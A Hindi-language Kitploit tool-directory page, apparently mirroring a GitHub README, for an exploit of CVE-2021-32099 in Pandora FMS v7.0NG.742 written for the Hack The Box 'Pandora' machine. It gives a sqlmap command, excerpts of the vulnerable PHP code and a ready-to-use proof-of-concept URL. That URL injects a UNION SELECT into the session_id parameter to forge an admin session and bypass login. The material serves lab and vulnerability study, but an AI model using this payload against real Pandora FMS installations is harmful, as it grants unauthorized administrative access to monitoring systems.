Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-32099_SQLi — CVE-2021-32099 SQL इंजेक्शन हमलावर को लॉगिन बायपास करने की अनुमति देता है। HTB की ओर से प्यार के साथ | Kitploit
उपकरण/GitHubGitHub/l3eol3eo/cve-2021-32099_sqli
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubl3eol3eo/cve-2021-32099_sqli

CVE-2021-32099_SQLi

CVE-2021-32099 SQL इंजेक्शन हमलावर को लॉगिन बायपास करने की अनुमति देता है। HTB की ओर से प्यार के साथ

रिपॉजिटरी देखें
71114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-32099 SQLi बायपास लॉगिन

Pandora.htb पर User Flag पढ़ने की कोशिश करते समय उपयोगी

CVE-2021-32099 SQLi हमलावर को लॉगिन बायपास करने की अनुमति देता है।

लक्ष्य

एक्सप्लॉइट: Pandora FMS v7.0NG.742_FIX_PERL2020

विश्लेषण

cvedetail से पढ़ें। हम लक्ष्य का एंडपॉइंट जानते हैं: http://localhost:8000/pandora_console/include/chart_generator.php?session_id=PayloadHere => Access denied.

alt text sqlmap -r req.txt -p session_id --dbms=mysql --dbs --risk=3 --level=5

एन्यूमरेट करने के बाद, हम केवल tsessions_php टेबल पर ध्यान केंद्रित करते हैं। tssessions_php में 3 कॉलम हैं: id_session, last_active, data। (sqlmap का परिणाम गलत फॉर्मेट में है)

alt text

/include/chart_generator.php

71  // Try to initialize session using existing php session id.
72  $user = new PandoraFMS\User(['phpsessionid' => $_REQUEST['session_id']]);
73  if (check_login(false) === false) {   
74     // Error handler.
 ⋮
96  }
97
98  // Access granted.
  • phpsessionid को session_id (PayloadHere) का मान सौंपा जाएगा

/include/lib/User.php

60  public function __construct($data)
61  {
 ⋮
68     if (is_array($data) === true) {
69        if (isset($data['phpsessionid']) === true) {
70           $this->sessions[$data['phpsessionid']] = 1;
71           $info = \db_get_row_filter(
72              'tsessions_php',
73              ['id_session' => $data['phpsessionid']]
74          );
75
76         if ($info !== false) {
77            // Process.
78            $session_data = session_decode($info['data']);
79            $this->idUser = $_SESSION['id_usuario'];
80
81            // Valid session.
82            return $this;
83         }
  • id_session को phpsessionid का मान सौंपा जाएगा
  • सभी कोड इस क्वेरी के लिए प्रदान करेंगे: select * from tsessions_php where id_session=***PayloadHere***

/include/lib/db/mysql.php

848  function db_get_row_filter($table, $filter, $fields=false)
849  {  
850     if (empty($fields)) {
851         $fields = '*';
852     }
 ⋮
861     $filter = db_format_array_where_clause_sql($filter, ' WHERE ');
 ⋮
868     $sql = sprintf('SELECT %s FROM %s %s', $fields, $table, $filter);

POC:

http://localhost:8000/pandora_console/include/chart_generator.php?session_id=PayloadHere%27%20union%20select%20%271%27,%272%27,%27id_usuario|s:5:%22admin%22;%27%20--%20a => Pandora FMS Graph ( - )

रीलोड करें: http://localhost:8000/pandora_console/ वेबपेज तक पहुंचने के लिए

संदर्भ:

https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

https://portswigger.net/daily-swig/multiple-vulnerabilities-in-pandora-fms-could-trigger-remote-execution-attack

टूल डाउनलोड करें